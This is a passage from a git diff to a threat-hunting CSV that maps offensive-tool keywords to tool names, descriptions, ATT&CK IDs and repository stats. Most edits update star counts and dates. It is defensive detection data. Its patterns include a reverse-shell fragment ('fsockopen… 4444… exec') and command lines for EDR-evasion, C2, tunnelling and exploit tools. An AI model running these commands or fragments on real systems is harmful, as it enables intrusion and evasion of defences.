processes. direct syscalls. and alternative execution methods","T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze","1","1","N/A","N/A","10","1334","166","2023-08-18T17:25:07Z","2022-09-21T14:40:59Z" "*Freeze-rs -*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","0","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*Freeze-rs_darwin_amd64*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" @@ -10431,24 +10582,24 @@ "*Freeze-rs_windows_amd64.exe*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*frida -l disableRoot.js -f owasp.mstg.uncrackable1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*frida-ps -U*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*frida-trace -x ntdll.dll -i * -p *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*frida-trace -x ntdll.dll -i * -p *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*frkngksl/NimExec*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z" -"*from .core import Fuzzer*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*from .wfuzz import *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from .core import Fuzzer*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*from .wfuzz import *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*from bofhound import *","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*from bofhound.ad import*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*from burp import *","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","568","192","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" -"*from burp import*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*from burp import *","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","0","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*from burp import*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*from Exrop import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*from helpers.*_smbserver * import SimpleSMBServer*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*from holehe.core import*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*from merlin import *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*from helpers.*_smbserver * import SimpleSMBServer*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*from holehe.core import*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*from merlin import *","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","0","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*from pwn import *","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "*from rarce import exploit*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*from shellcodes import *","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*from wapitiCore.*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*from wapitiCore.*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*frpc.exe -c frpc.in*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*fsockopen(*0.0.0.0*4444*exec(*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*fsockopen(*0.0.0.0*4444*exec(*","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*FtpC2.exe*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" "*FtpC2.Tasks*","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","10","10","72","15","2023-06-23T08:40:08Z","2023-06-09T12:41:28Z" "*ftshell -*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" @@ -10458,43 +10609,43 @@ "*FuckThatPacker.*","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","1","N/A","10","10","612","91","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*FudgeC2.*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*FudgeC2Viewer.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*fuff *-input-shell*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*fuff *-scraperfile*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*fuff *-scrapers*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-input-shell*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scraperfile*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*fuff *-scrapers*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*FULLSHADE/WindowsExploitationResources*","offensive_tool_keyword","WindowsExploitationResources","Resources for Windows exploit development","T1203 - T1210 - T1212 - T1216 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FULLSHADE/WindowsExploitationResources","1","1","N/A","N/A","10","1351","319","2021-12-20T00:21:07Z","2020-05-26T07:19:54Z" "*func_get_powershell_dll*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*func_install_wine_dotnettojscript*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" -"*function psenum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*function psenum*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*function Use-Zeus*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*FunnyWolf/pystinger*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" "*fuse_evil.*","offensive_tool_keyword","POC","Exploit for CVE-2022-27666","T1550 - T1555 - T1212 - T1558","TA0005","N/A","N/A","Exploitation tools","https://github.com/plummm/CVE-2022-27666","1","1","N/A","N/A","3","203","41","2022-03-28T18:21:00Z","2022-03-23T22:54:28Z" "*fuse_lowlevel.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" "*fuxploider --url * --not-regex ""wrong file type""*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*fuxploider*","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2667","485","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" -"*fuzz_option.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*fuzzdb*","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7641","2094","2023-02-21T15:21:06Z","2015-09-10T17:54:31Z" -"*fuzzfactory.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*fuzzrequest.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*fuxploider*","offensive_tool_keyword","fuxploider","Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.","T1526 - T1505 - T1506 - T1574","TA0006 - TA0008","N/A","N/A","Web Attacks","https://github.com/almandin/fuxploider","1","0","N/A","N/A","10","2668","485","2023-04-16T19:57:12Z","2017-07-14T09:30:06Z" +"*fuzz_option.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fuzzdb*","offensive_tool_keyword","fuzzdb","FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. and regex for matching server responses.","T1190 - T1191 - T1192 - T1193 - T1197","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/fuzzdb-project/fuzzdb","1","0","N/A","N/A","10","7640","2093","2023-02-21T15:21:06Z","2015-09-10T17:54:31Z" +"*fuzzfactory.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*fuzzrequest.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 